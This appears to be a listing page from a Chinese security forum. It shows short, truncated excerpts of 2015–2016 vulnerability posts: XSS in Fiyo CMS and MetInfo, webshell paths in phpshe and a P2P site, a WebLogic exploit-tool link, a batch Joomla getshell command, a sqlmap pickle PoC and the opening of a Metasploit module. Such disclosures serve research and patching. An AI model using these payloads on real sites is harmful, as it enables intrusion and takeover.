• Fiyo CMS 2.0.2.1 XSS漏洞

    Fiyo CMS 2.0.2.1 XSS漏洞
    *3. Affected Modules* Affected fields in the modules are listed below: i. Users User Group -> Group Name, Description ii. Modules Module Details->Judul Modul, Posisi iii. Menus Main Menu-> Menu Details->Nama Footer Menu-> Menu Details->Nama Categories->Menu Details->Judul Kategori Admin Panel-> ...
    作者:unhonker| 发布:2016年2月25日 | 分类:漏洞公布 | 阅读:1,998次| 标签:
  • MetInfo 5.3.3一处XSS

    MetInfo 5.3.3一处XSS
    比较鸡肋的一处XSS 漏洞细节: 后台——用户——管理员——编辑——在“姓名一栏”里插入代码 <script>alert('XSS')</script> 最后一步——保存
    作者:unhonker| 发布:2016年1月08日 | 分类:漏洞公布 | 阅读:2,712次| 标签:
  • phpshe后台任意文件删除(后台无限制拿shell)

    phpshe后台任意文件删除(后台无限制拿shell)
    90sec@Joseph case 'del':         pe_token_match();         $tpl_name = pe_dbhold($_g_tpl);         if ($tpl_name == 'default') pe_error('默认模板不能删除...');         if ($db->pe_num('setting', array('setting_key'=>'web_tpl', 'setting_value'=>$tpl_name))) {                 pe_error('模板正在使用中...');         }         else { ...
    作者:unhonker| 发布:2015年12月28日 | 分类:漏洞公布 | 阅读:2,848次| 标签:
  • 某p2p getshell

    某p2p getshell
    原作者:Joseph 这个漏洞有点鸡肋,毕竟牛逼的无限制的getshell肯定是给人家找我挖洞的。 <?php /* Uploadify     // Define a destination $targetFolder = '/uploads'; // Relative to the root   $verifyToken = md5('unique_salt' . $_POST['timestamp']);   if (!empty($_FILES) && $_POST['token'] == $verifyToken) {     $tempFile = $_FILES[...
    作者:unhonker| 发布:2015年12月26日 | 分类:漏洞公布 | 阅读:3,181次| 标签:
  • weblogic反序列化漏洞利用工具

    weblogic反序列化漏洞利用工具
    本文原创作者:rebeyond 额,文章有点长我就没转载过来,有兴趣的可以进行抓包看下。 这个东西,我是在本机试过的,可用。 工具下载: http://pan.baidu.com/s/1pKwlNWv 提取密码: twjd
    作者:unhonker| 发布:2015年12月23日 | 分类:漏洞公布 | 阅读:10,841次| 标签:
  • JOOMLA 1.5 – 3.4.5 远程代码执行之批量GETSHELL

    JOOMLA 1.5 – 3.4.5 远程代码执行之批量GETSHELL
    @安全小飞侠 0X01 背景 近日,Joomla 1.5 – 3.4.5爆出了一个远程代码执行的漏洞,此洞可谓影响相当之大,各个安全机构都发布了漏洞的分析报告和POC,笔者就不在此赘述了 执行命令python hackUtils.py -r [url文件]一键获取webshell: hackUtils-master
    作者:unhonker| 发布:2015年12月17日 | 分类:漏洞公布 | 阅读:7,199次| 标签:
  • Joomla远程代码执行详解

    Joomla远程代码执行详解
    朋友在群里发来的消息。 关于今天最新爆出的joomla 0day,经360研究人员分析发现,此为session 反序列代码执行高危漏洞。 代码分析: 此漏洞为session存储机制带来的安全隐患,在php中session是通过序列化存储的,且存储方式有:php、php_binary(php>5.44用php_serialize)、 wddx PHP默认安装设置session.serialize_handler的值是php,因此seesion的序列化格式为: 键名 + ...
    作者:unhonker| 发布:2015年12月15日 | 分类:漏洞公布 | 阅读:3,346次| 标签:
  • sqlmap代码执行漏洞

    sqlmap代码执行漏洞
    这个漏洞今天在微博上传的比较火。。。。。 下面给出相关POC sqlmap.py -u "http://www.ihonker.org/s?wd=sqli" --pickled-options "Y3N1YnByb2Nlc3MKUG9wZW4KcDEKKFMnY2FsYy5leGUnCnAyCnRwMwpScDQKLg==" base64解码 csubprocessPopenp1(S'calc.exe'p2tp3Rp4. 视频 http://video.weibo.com/player/1034:4cbd333b0bf3af1de46ea99660b9a8b5/v.swf
    作者:unhonker| 发布:2015年12月09日 | 分类:漏洞公布 | 阅读:2,454次| 标签:
  • Joomla SQL注入和远程代码执行漏洞

    Joomla SQL注入和远程代码执行漏洞
    发布日期:2015.11.21 通杀版本:3.2——3.4.4 CVE-2015-7297 CVE-2015-7857 CVE-2015-7858 相关Exp见代码 ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require 'msf/core'   class Metasploit3 < Msf::Exploit::Remote   Rank = ExcellentRanking     inc...
    作者:unhonker| 发布:2015年11月21日 | 分类:漏洞公布 | 阅读:4,168次| 标签:,